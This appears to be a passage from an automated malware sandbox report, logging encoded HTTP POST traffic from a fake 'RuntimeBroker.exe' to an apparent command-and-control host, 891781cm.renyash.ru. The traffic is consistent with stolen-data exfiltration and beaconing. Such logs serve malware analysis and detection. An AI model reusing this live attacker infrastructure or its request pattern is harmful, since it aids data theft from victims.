                                                                                                                          Jan 1, 2025 04:23:15.061182022 CET5INData Raw: 30 0d 0a 0d 0a
                                                                                                                          Data Ascii: 0


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          94192.168.2.449952104.21.38.84808128C:\Program Files\Windows Security\RuntimeBroker.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Jan 1, 2025 04:23:15.179670095 CET344OUTPOST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                          Host: 891781cm.renyash.ru
                                                                                                                          Content-Length: 1056
                                                                                                                          Expect: 100-continue
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Jan 1, 2025 04:23:15.537368059 CET1056OUTData Raw: 55 53 58 54 5f 59 54 59 55 5a 54 59 51 58 55 5c 58 59 5c 5a 59 5c 52 5e 5d 5b 46 5d 56 5d 56 51 42 5a 55 53 5d 5f 52 5a 58 54 51 59 5d 54 51 5a 52 51 5f 58 43 5b 54 59 53 5a 56 5b 54 53 53 59 5f 52 5d 5e 58 45 5a 51 5a 5c 58 5f 5c 53 59 51 59 52
                                                                                                                          Data Ascii: USXT_YTYUZTYQXU\XY\ZY\R^][F]V]VQBZUS]_RZXTQY]TQZRQ_XC[TYSZV[TSSY_R]^XEZQZ\X_\SYQYRZVVX\Y__XTX\QP[SX]X[FTTQ^^YZ\S\_PW_]Z]XXQQW[ZXZQ_VY^\X\X[Q_BXVZ[VTUVUAC]Y]V^YQFP_B\XTSPCU^V_TQF[Z]ZYSZ X+!\#[%")-<0B.U.7'Y"0Z;[, <=+><#^!'^)+
                                                                                                                          Jan 1, 2025 04:23:15.718781948 CET25INHTTP/1.1 100 Continue
                                                                                                                          Jan 1, 2025 04:23:15.980297089 CET809INHTTP/1.1 200 OK
                                                                                                                          Date: Wed, 01 Jan 2025 03:23:15 GMT
                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: keep-alive
                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2BOKnPq7RkMyd9e2VRR%2FpChaSG1dnVGNtwXnYDSuDpZNcuIITo5Hg2L0%2FgDWVHLIa4rmPmnXgGTGRZi7DbKkA1pubeK2O3QFDnT3hh%2FqU1bo6nghKKxcnu%2FGNxP1%2FfDT1dhNNeT8S"}],"group":"cf-nel","max_age":604800}
                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                          Server: cloudflare
                                                                                                                          CF-RAY: 8faf63be6c8142a9-EWR
                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=3494&min_rtt=1665&rtt_var=4284&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=1400&delivery_rate=89554&cwnd=31&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                          Data Raw: 34 0d 0a 31 56 5b 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                          Data Ascii: 41V[X0


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          95192.168.2.449958104.21.38.84808128C:\Program Files\Windows Security\RuntimeBroker.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Jan 1, 2025 04:23:16.108911037 CET344OUTPOST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                          Host: 891781cm.renyash.ru
                                                                                                                          Content-Length: 1056
                                                                                                                          Expect: 100-continue
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Jan 1, 2025 04:23:16.459261894 CET1056OUTData Raw: 55 53 5d 51 5a 5a 51 5c 55 5a 54 59 51 5f 55 57 58 59 5c 5e 59 50 52 5c 5d 5b 46 5d 56 5d 56 51 42 5a 55 53 5d 5f 52 5a 58 54 51 59 5d 54 51 5a 52 51 5f 58 43 5b 54 59 53 5a 56 5b 54 53 53 59 5f 52 5d 5e 58 45 5a 51 5a 5c 58 5f 5c 53 59 51 59 52
                                                                                                                          Data Ascii: US]QZZQ\UZTYQ_UWXY\^YPR\][F]V]VQBZUS]_RZXTQY]TQZRQ_XC[TYSZV[TSSY_R]^XEZQZ\X_\SYQYRZVVX\Y__XTX\QP[SX]X[FTTQ^^YZ\S\_PW_]Z]XXQQW[ZXZQ_VY^\X\X[Q_BXVZ[VTUVUAC]Y]V^YQFP_B\XTSPCU^V_TQF[Z]ZYSZ#+<"#;:$.]>=#['-94,_3Y*U';Y;/<=4=<#^!'^)7
                                                                                                                          Jan 1, 2025 04:23:16.553520918 CET25INHTTP/1.1 100 Continue
                                                                                                                          Jan 1, 2025 04:23:16.830991983 CET814INHTTP/1.1 200 OK
                                                                                                                          Date: Wed, 01 Jan 2025 03:23:16 GMT
                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: keep-alive
                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kj9CDh%2BHjzVO5odR5Y8Czg6%2F5tmXP4rf%2FPiVrFnu7l%2BUwHQFI%2F3y4Qjg1eJwJPd%2BQR5b3TfUSYasimn22QAeMvSnQsxWQM8xaSkv%2FYVJwQy007SIAkw%2Bc46dLzHiQJv1r6SqqCrd"}],"group":"cf-nel","max_age":604800}
                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                          Server: cloudflare
                                                                                                                          CF-RAY: 8faf63c43e0941a3-EWR
                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=5354&min_rtt=2213&rtt_var=7112&sent=4&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=1400&delivery_rate=53395&cwnd=151&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                          Data Raw: 34 0d 0a 31 56 5b 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                          Data Ascii: 41V[X0


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          96192.168.2.449964104.21.38.84808128C:\Program Files\Windows Security\RuntimeBroker.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Jan 1, 2025 04:23:16.971031904 CET344OUTPOST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                          Host: 891781cm.renyash.ru
                                                                                                                          Content-Length: 1056
                                                                                                                          Expect: 100-continue
                                                                                                                          Connection: Keep-Alive


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          97192.168.2.449965104.21.38.84808128C:\Program Files\Windows Security\RuntimeBroker.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Jan 1, 2025 04:23:17.127516031 CET344OUTPOST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                          Host: 891781cm.renyash.ru
                                                                                                                          Content-Length: 1780
                                                                                                                          Expect: 100-continue
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Jan 1, 2025 04:23:17.475413084 CET1780OUTData Raw: 55 55 5d 50 5a 57 51 59 55 5a 54 59 51 52 55 56 58 58 5c 54 59 5d 52 59 5d 5b 46 5d 56 5d 56 51 42 5a 55 53 5d 5f 52 5a 58 54 51 59 5d 54 51 5a 52 51 5f 58 43 5b 54 59 53 5a 56 5b 54 53 53 59 5f 52 5d 5e 58 45 5a 51 5a 5c 58 5f 5c 53 59 51 59 52
                                                                                                                          Data Ascii: UU]PZWQYUZTYQRUVXX\TY]RY][F]V]VQBZUS]_RZXTQY]TQZRQ_XC[TYSZV[TSSY_R]^XEZQZ\X_\SYQYRZVVX\Y__XTX\QP[SX]X[FTTQ^^YZ\S\_PW_]Z]XXQQW[ZXZQ_VY^\X\X[Q_BXVZ[VTUVUAC]Y]V^YQFP_B\XTSPCU^V_TQF[Z]ZYSZ Y<<* 8>$.](>#Y'$9.$Y0?)','--+(')#^!'^)
                                                                                                                          Jan 1, 2025 04:23:17.638082981 CET25INHTTP/1.1 100 Continue
                                                                                                                          Jan 1, 2025 04:23:17.801208019 CET958INHTTP/1.1 200 OK
                                                                                                                          Date: Wed, 01 Jan 2025 03:23:17 GMT
                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: keep-alive
                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=e6wMngMVCKICoY9%2BD9iXA6HeljAR5UAZ3BGhuSiuciCBixLY8%2Fzv5KZwax%2BdlqFzTvx5K4wAZJX2%2FNiB6hzqawQ0x3WoBK%2FfetBO2yVy79N05xfENJ7JqsFj3A4jVT3k1kXWTpwq"}],"group":"cf-nel","max_age":604800}
                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                          Server: cloudflare
                                                                                                                          CF-RAY: 8faf63caebbb7c8d-EWR
                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=7907&min_rtt=1920&rtt_var=12695&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=2124&delivery_rate=29303&cwnd=184&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                          Data Raw: 39 38 0d 0a 03 1e 22 57 27 3b 09 15 28 07 3e 1e 2c 2f 33 50 24 3f 26 58 30 20 30 5f 25 3e 2a 05 2e 38 06 1e 3f 3b 2b 5e 25 2a 25 5f 37 31 36 1f 31 0c 2e 5d 04 1d 25 5d 3d 04 26 15 28 11 3a 06 2a 31 2c 1b 33 09 0d 5b 32 42 3f 04 24 3e 3d 03 21 21 33 54 24 0d 2c 52 2b 00 23 58 30 3d 0c 55 20 3a 2e 57 0d 12 22 51 25 00 35 57 3e 31 24 52 22 3f 30 0d 30 01 20 08 30 02 28 1c 34 2b 2a 56 2b 2c 24 10 35 19 2d 55 27 2a 2c 01 35 3a 3d 5a 21 23 22 54 20 03 2f 54 05 3d 56 4f 0d 0a 30 0d 0a 0d 0a
                                                                                                                          Data Ascii: 98"W';(>,/3P$?&X0 0_%>*.8?;+^%*%_7161.]%]=&(:*1,3[2B?$>=!!3T$,R+#X0=U :.W"Q%5W>1$R"?00 0(4+*V+,$5-U'*,5:=Z!#"T /T=VO0
                                                                                                                          Jan 1, 2025 04:23:18.029102087 CET958INHTTP/1.1 200 OK
                                                                                                                          Date: Wed, 01 Jan 2025 03:23:17 GMT
                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: keep-alive
                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=e6wMngMVCKICoY9%2BD9iXA6HeljAR5UAZ3BGhuSiuciCBixLY8%2Fzv5KZwax%2BdlqFzTvx5K4wAZJX2%2FNiB6hzqawQ0x3WoBK%2FfetBO2yVy79N05xfENJ7JqsFj3A4jVT3k1kXWTpwq"}],"group":"cf-nel","max_age":604800}
                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                          Server: cloudflare
                                                                                                                          CF-RAY: 8faf63caebbb7c8d-EWR
                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=7907&min_rtt=1920&rtt_var=12695&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=2124&delivery_rate=29303&cwnd=184&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                          Data Raw: 39 38 0d 0a 03 1e 22 57 27 3b 09 15 28 07 3e 1e 2c 2f 33 50 24 3f 26 58 30 20 30 5f 25 3e 2a 05 2e 38 06 1e 3f 3b 2b 5e 25 2a 25 5f 37 31 36 1f 31 0c 2e 5d 04 1d 25 5d 3d 04 26 15 28 11 3a 06 2a 31 2c 1b 33 09 0d 5b 32 42 3f 04 24 3e 3d 03 21 21 33 54 24 0d 2c 52 2b 00 23 58 30 3d 0c 55 20 3a 2e 57 0d 12 22 51 25 00 35 57 3e 31 24 52 22 3f 30 0d 30 01 20 08 30 02 28 1c 34 2b 2a 56 2b 2c 24 10 35 19 2d 55 27 2a 2c 01 35 3a 3d 5a 21 23 22 54 20 03 2f 54 05 3d 56 4f 0d 0a 30 0d 0a 0d 0a
                                                                                                                          Data Ascii: 98"W';(>,/3P$?&X0 0_%>*.8?;+^%*%_7161.]%]=&(:*1,3[2B?$>=!!3T$,R+#X0=U :.W"Q%5W>1$R"?00 0(4+*V+,$5-U'*,5:=Z!#"T /T=VO0


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          98192.168.2.449967104.21.38.84808128C:\Program Files\Windows Security\RuntimeBroker.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Jan 1, 2025 04:23:17.240282059 CET344OUTPOST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                          Host: 891781cm.renyash.ru
                                                                                                                          Content-Length: 1048
                                                                                                                          Expect: 100-continue
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Jan 1, 2025 04:23:17.584228039 CET1048OUTData Raw: 55 5e 58 53 5a 5b 51 5f 55 5a 54 59 51 5b 55 50 58 5c 5c 55 59 52 52 5e 5d 5b 46 5d 56 5d 56 51 42 5a 55 53 5d 5f 52 5a 58 54 51 59 5d 54 51 5a 52 51 5f 58 43 5b 54 59 53 5a 56 5b 54 53 53 59 5f 52 5d 5e 58 45 5a 51 5a 5c 58 5f 5c 53 59 51 59 52
                                                                                                                          Data Ascii: U^XSZ[Q_UZTYQ[UPX\\UYRR^][F]V]VQBZUS]_RZXTQY]TQZRQ_XC[TYSZV[TSSY_R]^XEZQZ\X_\SYQYRZVVX\Y__XTX\QP[SX]X[FTTQ^^YZ\S\_PW_]Z]XXQQW[ZXZQ_VY^\X\X[Q_BXVZ[VTUVUAC]Y]V^YQFP_B\XTSPCU^V_TQF[Z]ZYSZ#)?![#&.%X>$$B:,'$X3*T3?';'(U>#^!'^)3
                                                                                                                          Jan 1, 2025 04:23:17.732790947 CET25INHTTP/1.1 100 Continue
                                                                                                                          Jan 1, 2025 04:23:18.029083014 CET804INHTTP/1.1 200 OK
                                                                                                                          Date: Wed, 01 Jan 2025 03:23:17 GMT
                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: keep-alive
                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xt1ZD8XRObij%2FXSJsOqm8VfyKRz9OjT8AzBi8xI9XtPp0lb7qkocuIHp5ZkiW2iSi55Qp8YnDl8X7qMS%2B3b1gRRRQ45KiTS23Z0C8huEPSrSv7mxHgCMNCe%2BAa9qB9zBpk2KYzpS"}],"group":"cf-nel","max_age":604800}
                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                          Server: cloudflare
                                                                                                                          CF-RAY: 8faf63cb8b75c34d-EWR
                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=5009&min_rtt=2153&rtt_var=6519&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1392&delivery_rate=58397&cwnd=251&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                          Data Raw: 34 0d 0a 31 56 5b 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                          Data Ascii: 41V[X0


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          99192.168.2.449977104.21.38.84808128C:\Program Files\Windows Security\RuntimeBroker.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Jan 1, 2025 04:23:18.165528059 CET320OUTPOST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                          Host: 891781cm.renyash.ru
                                                                                                                          Content-Length: 1056
                                                                                                                          Expect: 100-continue
                                                                                                                          Jan 1, 2025 04:23:18.521848917 CET1056OUTData Raw: 55 51 5d 53 5a 5f 51 58 55 5a 54 59 51 5f 55 55 58 53 5c 5d 59 52 52 5f 5d 5b 46 5d 56 5d 56 51 42 5a 55 53 5d 5f 52 5a 58 54 51 59 5d 54 51 5a 52 51 5f 58 43 5b 54 59 53 5a 56 5b 54 53 53 59 5f 52 5d 5e 58 45 5a 51 5a 5c 58 5f 5c 53 59 51 59 52
                                                                                                                          Data Ascii: UQ]SZ_QXUZTYQ_UUXS\]YRR_][F]V]VQBZUS]_RZXTQY]TQZRQ_XC[TYSZV[TSSY_R]^XEZQZ\X_\SYQYRZVVX\Y__XTX\QP[SX]X[FTTQ^^YZ\S\_PW_]Z]XXQQW[ZXZQ_VY^\X\X[Q_BXVZ[VTUVUAC]Y]V^YQFP_B\XTSPCU^V_TQF[Z]ZYSZ ^+/\ (!&=.<0:$^$,5'+Z8./(>*<#^!'^)7
                                                                                                                          Jan 1, 2025 04:23:18.649029016 CET25INHTTP/1.1 100 Continue
                                                                                                                          Jan 1, 2025 04:23:18.905567884 CET804INHTTP/1.1 200 OK
                                                                                                                          Date: Wed, 01 Jan 2025 03:23:18 GMT
                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: keep-alive
                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=N3jMyKQ22HCKpvlg0JLyftBqst6cpGLXvGdla7vPuRqEFMuSHOMk7QNc2mxu%2FO8G4ygoctcR9jBT1%2FfeFnoXfBbIpfPHfHvo1NFwAYs6r7n%2BTvmEPl4rGGCLlCzl32eod81RauGm"}],"group":"cf-nel","max_age":604800}
                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                          Server: cloudflare
                                                                                                                          CF-RAY: 8faf63d14ab772b1-EWR
                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=5101&min_rtt=1960&rtt_var=7018&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1376&delivery_rate=53888&cwnd=166&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                          Data Raw: 34 0d 0a 31 56 5b 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                          Data Ascii: 41V[X0


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          100192.168.2.449983104.21.38.84808128C:\Program Files\Windows Security\RuntimeBroker.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Jan 1, 2025 04:23:19.038798094 CET344OUTPOST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                          Host: 891781cm.renyash.ru
                                                                                                                          Content-Length: 1048
                                                                                                                          Expect: 100-continue
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Jan 1, 2025 04:23:19.396797895 CET1048OUTData Raw: 55 57 58 50 5f 5d 51 5e 55 5a 54 59 51 5b 55 51 58 5b 5c 5e 59 50 52 52 5d 5b 46 5d 56 5d 56 51 42 5a 55 53 5d 5f 52 5a 58 54 51 59 5d 54 51 5a 52 51 5f 58 43 5b 54 59 53 5a 56 5b 54 53 53 59 5f 52 5d 5e 58 45 5a 51 5a 5c 58 5f 5c 53 59 51 59 52
                                                                                                                          Data Ascii: UWXP_]Q^UZTYQ[UQX[\^YPRR][F]V]VQBZUS]_RZXTQY]TQZRQ_XC[TYSZV[TSSY_R]^XEZQZ\X_\SYQYRZVVX\Y__XTX\QP[SX]X[FTTQ^^YZ\S\_PW_]Z]XXQQW[ZXZQ_VY^\X\X[Q_BXVZ[VTUVUAC]Y]V^YQFP_B\XTSPCU^V_TQF[Z]ZYSZ#+)Y!8![1%Y>00-43Y.V'#;>4(((<#^!'^)7
                                                                                                                          Jan 1, 2025 04:23:19.510412931 CET25INHTTP/1.1 100 Continue
                                                                                                                          Jan 1, 2025 04:23:19.680977106 CET809INHTTP/1.1 200 OK
                                                                                                                          Date: Wed, 01 Jan 2025 03:23:19 GMT
                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: keep-alive
                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=CGmPuH5b%2FUUG5pxSK5JB0QQzK2UoHhbIc6%2BjvVYD2fFcUNdYz3KsrXAprHTK1RoXvTk6Ab2wK%2Fi9BD1b9%2FASF%2F8U5oTcIN3duFJHz5lfl9vnhDgKvG4ICAcrCVXKNhiZhpwcSXnQ"}],"group":"cf-nel","max_age":604800}
                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                          Server: cloudflare
                                                                                                                          CF-RAY: 8faf63d6aed00c90-EWR
                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=3136&min_rtt=1727&rtt_var=3466&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1392&delivery_rate=112307&cwnd=209&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                          Data Raw: 34 0d 0a 31 56 5b 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                          Data Ascii: 41V[X0


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          101192.168.2.449989104.21.38.84808128C:\Program Files\Windows Security\RuntimeBroker.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Jan 1, 2025 04:23:19.843095064 CET344OUTPOST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                          Host: 891781cm.renyash.ru
                                                                                                                          Content-Length: 1056
                                                                                                                          Expect: 100-continue
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Jan 1, 2025 04:23:20.193643093 CET1056OUTData Raw: 55 56 58 57 5a 59 54 58 55 5a 54 59 51 52 55 55 58 58 5c 58 59 57 52 52 5d 5b 46 5d 56 5d 56 51 42 5a 55 53 5d 5f 52 5a 58 54 51 59 5d 54 51 5a 52 51 5f 58 43 5b 54 59 53 5a 56 5b 54 53 53 59 5f 52 5d 5e 58 45 5a 51 5a 5c 58 5f 5c 53 59 51 59 52
                                                                                                                          Data Ascii: UVXWZYTXUZTYQRUUXX\XYWRR][F]V]VQBZUS]_RZXTQY]TQZRQ_XC[TYSZV[TSSY_R]^XEZQZ\X_\SYQYRZVVX\Y__XTX\QP[SX]X[FTTQ^^YZ\S\_PW_]Z]XXQQW[ZXZQ_VY^\X\X[Q_BXVZ[VTUVUAC]Y]V^YQFP_B\XTSPCU^V_TQF[Z]ZYSZ (,578!&)X(.+&':.7 $/U0;_,>#(>+(<#^!'^)
                                                                                                                          Jan 1, 2025 04:23:20.289315939 CET25INHTTP/1.1 100 Continue
                                                                                                                          Jan 1, 2025 04:23:20.469702959 CET804INHTTP/1.1 200 OK
                                                                                                                          Date: Wed, 01 Jan 2025 03:23:20 GMT
                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: keep-alive
                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=WljUdq6Zf%2BEp%2FcoFHoVElerb1txzfksksiVk3Uo%2FduPMtsvUvLKd9zOZWuViJBWhXVCDDYBdz7lmu4iNJhbTwkzePn1U9yJNE0q9LhaExtMWz4xBANhdnwZO1fqs4AldBbNOoZ8p"}],"group":"cf-nel","max_age":604800}
                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                          Server: cloudflare
                                                                                                                          CF-RAY: 8faf63db8d650f8c-EWR
                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=4643&min_rtt=1607&rtt_var=6675&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1400&delivery_rate=56372&cwnd=211&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                          Data Raw: 34 0d 0a 31 56 5b 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                          Data Ascii: 41V[X0


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          102192.168.2.449995104.21.38.84808128C:\Program Files\Windows Security\RuntimeBroker.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Jan 1, 2025 04:23:20.602792978 CET344OUTPOST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                          Host: 891781cm.renyash.ru
                                                                                                                          Content-Length: 1056
                                                                                                                          Expect: 100-continue
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Jan 1, 2025 04:23:20.960031986 CET1056OUTData Raw: 55 56 58 57 5f 5a 51 5c 55 5a 54 59 51 53 55 57 58 53 5c 5a 59 53 52 58 5d 5b 46 5d 56 5d 56 51 42 5a 55 53 5d 5f 52 5a 58 54 51 59 5d 54 51 5a 52 51 5f 58 43 5b 54 59 53 5a 56 5b 54 53 53 59 5f 52 5d 5e 58 45 5a 51 5a 5c 58 5f 5c 53 59 51 59 52
                                                                                                                          Data Ascii: UVXW_ZQ\UZTYQSUWXS\ZYSRX][F]V]VQBZUS]_RZXTQY]TQZRQ_XC[TYSZV[TSSY_R]^XEZQZ\X_\SYQYRZVVX\Y__XTX\QP[SX]X[FTTQ^^YZ\S\_PW_]Z]XXQQW[ZXZQ_VY^\X\X[Q_BXVZ[VTUVUAC]Y]V^YQFP_B\XTSPCU^V_TQF[Z]ZYSZ#??]#(>2=#'7--4]3.$<-.4+><V)#^!'^)
                                                                                                                          Jan 1, 2025 04:23:21.064512968 CET25INHTTP/1.1 100 Continue
                                                                                                                          Jan 1, 2025 04:23:21.268400908 CET804INHTTP/1.1 200 OK
                                                                                                                          Date: Wed, 01 Jan 2025 03:23:21 GMT
                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: keep-alive
                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=rUP4esHsAoid355O4kixeCRA3LLnKGs%2FlV%2Foutr0xPy8yJAmAN5jzSWjkfHZk47noXw%2BrrGPpDKI4c0FiYbkCBZVEFWGe3thrHPc8W40u3uoFoeaqEu1Zrg1rmIpXca5fSjxHEHv"}],"group":"cf-nel","max_age":604800}
                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                          Server: cloudflare
                                                                                                                          CF-RAY: 8faf63e05e1cc402-EWR
                                                                                                                          alt-svc: h3=":443"; ma=86400
